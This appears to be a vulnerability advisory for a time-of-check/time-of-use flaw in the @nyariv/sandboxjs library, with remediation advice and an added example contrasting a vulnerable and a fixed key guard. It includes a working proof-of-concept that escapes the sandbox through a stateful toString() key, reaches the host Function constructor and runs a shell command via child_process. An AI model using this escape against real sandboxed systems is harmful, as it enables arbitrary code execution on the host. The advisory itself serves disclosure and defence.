Time-of-check Time-of-use (TOCTOU) Race Condition Affecting @nyariv/sandboxjs package, versions <0.8.29


Severity

critical (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.04% (11th percentile)

  • Snyk ID: SNYK-JS-NYARIVSANDBOXJS-15248293
  • Published: 8 Feb 2026
  • Disclosed: 5 Feb 2026
  • Credit: Cristian-Alexandru STAICU

Introduced: 5 Feb 2026

CVE-2026-25641
CWE-367

How to fix?

Upgrade @nyariv/sandboxjs to version 0.8.29 or higher.

Overview

@nyariv/sandboxjs is a JavaScript sandboxing library.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in addOps() and other methods in executor.ts, which do not coerce a property key to a primitive once before checking it. The key is sanitized in its string form (time of check) and then coerced again when the property is actually accessed (time of use), so an object key with a stateful toString() can answer with a harmless name during sanitization and with a forbidden name such as "__proto__" on the second coercion. This lets sandboxed code reach prototypes the sandbox is meant to deny, tamper with them, and from there obtain the host Function constructor and execute arbitrary code on the underlying system.

PoC

const Sandbox = require('@nyariv/sandboxjs').default;

// Everything in `code` runs inside the sandbox. The goal is to reach the host
// Function constructor and run a shell command from there.
const code = `
let a = new Map;
a.x = 23;
let count = 0;

// A property key whose string form changes between coercions: "x" the first
// time (this is what key sanitization sees), "__proto__" every time after
// (this is what the property access actually uses).
let nastyProp = {toString: () => {if (count<1){count++;return "x"} else return "__proto__"}}

// Time of check passes as a["x"]; time of use resolves a["__proto__"],
// i.e. Map.prototype, which the sandbox shares with the host.
let mapProt = a[nastyProp];

// Tamper with the shared Map prototype. After this the sandbox no longer
// stops the access to isFinite.constructor, the host Function constructor.
mapProt.has = isFinite;

// process.getBuiltinModule needs Node.js 22.3 or later (also backported to
// 20.16); a host-level require() is not available inside Function().
console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`;

const scope = {};
const sandbox = new Sandbox();
const exec = sandbox.compile(code);
exec(scope).run();
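The bug class behind the overview and the PoC above, reduced to its essentials as an added example (this is not @nyariv/sandboxjs's own code, and the names getVulnerable, getFixed, makeFlipKey and the FORBIDDEN set are assumptions for illustration): a property-access guard that coerces the key once for the check and again for the access, beside the fixed form that coerces once and reuses that value.

```javascript
// Added example, not code from @nyariv/sandboxjs. Minimal property-access
// guard showing the TOCTOU-on-key-coercion pattern and its fix. The function
// names and the FORBIDDEN set are illustrative assumptions.

const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable: the key is coerced to a string for the check, then coerced a
// second time by the [] access. An object key with a stateful toString() can
// answer differently at each coercion.
function getVulnerable(obj, key) {
  const checked = String(key);            // time of check: first ToString
  if (FORBIDDEN.has(checked)) {
    throw new Error(`forbidden key: ${checked}`);
  }
  return obj[key];                        // time of use: second ToString
}

// Fixed: coerce exactly once up front and use that same primitive for both
// the check and the access. Symbols stay symbols; everything else becomes a
// string, so the value checked is the value used.
function getFixed(obj, key) {
  const k = typeof key === 'symbol' ? key : String(key);
  if (typeof k === 'string' && FORBIDDEN.has(k)) {
    throw new Error(`forbidden key: ${k}`);
  }
  return obj[k];
}

// Constructed attacker-controlled key modelled on the PoC's nastyProp:
// returns `first` on the first coercion and `later` on every later one.
function makeFlipKey(first, later) {
  let calls = 0;
  return { toString: () => (calls++ === 0 ? first : later) };
}

// Runs both guards against the same target and reports what each returned.
function demo() {
  const target = new Map();
  target.x = 23;

  // Vulnerable guard: the check sees "x", the access resolves "__proto__",
  // so the caller receives Map.prototype instead of 23.
  const leaked = getVulnerable(target, makeFlipKey('x', '__proto__'));

  // Fixed guard: the single coercion yields "x" and that string is used for
  // the access too, so the real property is read.
  const safe = getFixed(target, makeFlipKey('x', '__proto__'));

  // Fixed guard with an outright forbidden key is rejected.
  let rejected = false;
  try {
    getFixed(target, { toString: () => '__proto__' });
  } catch (e) {
    rejected = true;
  }

  return {
    leakedIsMapPrototype: leaked === Map.prototype,
    safeValue: safe,
    rejected,
  };
}

console.log(demo());
```

Note that the fixed form still runs attacker-controlled toString() once; what it removes is the second, unchecked evaluation. Any sandbox that validates keys against a deny- or allow-list has to validate the exact primitive it will later index with, never the original object.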
